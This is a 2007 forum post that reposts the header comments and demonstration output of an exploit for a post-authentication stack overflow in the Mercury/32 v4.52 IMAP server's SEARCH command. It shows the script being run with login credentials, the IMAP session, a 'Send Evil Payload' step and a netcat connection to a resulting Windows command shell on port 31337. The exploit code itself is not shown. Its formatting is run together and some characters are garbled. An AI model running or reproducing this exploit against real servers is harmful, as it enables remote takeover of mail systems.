nullbyte Posted September 19, 2007 Report Posted September 19, 2007 # Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit# Found & Code by void# ph4nt0m.org## S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.# C: pst06 LOGIN void ph4nt0m.org# S: pst06 OK LOGIN completed.# C: pst06 SELECT INBOX# S: * 0 EXISTS# S: * 0 RECENT# S: * FLAGS (\Deleted \Draft \Seen \Answered)# S: * OK [uIDVALIDITY 1190225819] UID Validity# S: * OK [uIDNEXT 1] Predicted next UID# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag# s# S: pst06 OK [READ-WRITE] SELECT completed.# [*] Send Evil Payload ...# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck ## Z:\Exp>nc -vv 127.0.0.1 31337# DNS fwd/rev mismatch: localhost != GNU# localhost [127.0.0.1] 31337 (?) open# Microsoft Windows XP [°? 5.1.2600]# © ° Quote
